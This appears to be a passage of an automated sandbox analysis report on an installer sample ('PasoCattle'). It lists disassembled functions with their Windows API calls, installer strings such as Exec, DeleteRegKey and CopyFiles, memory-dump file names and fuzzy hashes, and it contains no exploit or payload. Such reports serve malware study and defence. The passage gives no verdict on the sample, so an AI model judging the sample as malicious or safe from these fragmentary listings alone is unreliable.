Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,759223A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
FreeLibrary.KERNEL32(?,?), ref: 004024C3

Strings

`G, xrefs: 0040246E
Error registering DLL: Could not initialize OLE, xrefs: 004024F1
Error registering DLL: %s not found in %s, xrefs: 0040249A
Error registering DLL: Could not load %s, xrefs: 004024DB

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
API String ID: 1033533793-4193110038
Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D

Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00403E10
GetSysColor.USER32(00000000), ref: 00403E2C
SetTextColor.GDI32(?,00000000), ref: 00403E38
SetBkMode.GDI32(?,?), ref: 00403E44
GetSysColor.USER32(?), ref: 00403E57
SetBkColor.GDI32(?,?), ref: 00403E67
DeleteObject.GDI32(?), ref: 00403E81
CreateBrushIndirect.GDI32(?), ref: 00403E8B

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94

Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042A4AD,759223A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,759223A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,759223A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2

Strings

Exec: failed createprocess ("%s"), xrefs: 004022C2
Exec: command="%s", xrefs: 00402241
Exec: success ("%s"), xrefs: 00402263

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
API String ID: 2014279497-3433828417
Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D

Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
GetMessagePos.USER32 ref: 0040489D
ScreenToClient.USER32(?,?), ref: 004048B5
SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED

Strings

f, xrefs: 004048C9

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4

Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
MulDiv.KERNEL32(00012C00,00000064,00103847), ref: 00403295
wsprintfW.USER32 ref: 004032A5
SetWindowTextW.USER32(?,?), ref: 004032B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7

Strings

verifying installer: %d%%, xrefs: 0040329F

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58

Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
CharNextW.USER32(?,?,?,00000000), ref: 004060D6
CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

Strings

*?|<>/":, xrefs: 004060B6

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD

Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401504
RegCloseKey.ADVAPI32(?), ref: 00401529
RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29

Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 004020A3
GetClientRect.USER32(00000000,?), ref: 004020B0
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
DeleteObject.GDI32(00000000), ref: 004020EE

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28

Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE

Strings

!, xrefs: 00401FB6

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758

Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
wsprintfW.USER32 ref: 00404483
SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496

Strings

%u.%u%s%s, xrefs: 00404470

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259

Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B

RegCloseKey.ADVAPI32(00000000), ref: 0040282E
RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
DeleteRegKey: "%s\%s", xrefs: 00402843

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: CloseDeleteOpenValuelstrlenwvsprintf
String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
API String ID: 1697273262-1764544995
Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD

Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318

lstrlenW.KERNEL32 ref: 004026B4
lstrlenW.KERNEL32(00000000), ref: 004026C1
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC

Strings

CopyFiles "%s"->"%s", xrefs: 0040267F

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
String ID: CopyFiles "%s"->"%s"
API String ID: 2577523808-3778932970
Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759

Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 004062A4
lstrcatW.KERNEL32(00000000,...), ref: 004062C7

Strings

%02x%c, xrefs: 0040629C
..., xrefs: 004062BF

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: lstrcatwsprintf
String ID: %02x%c$...
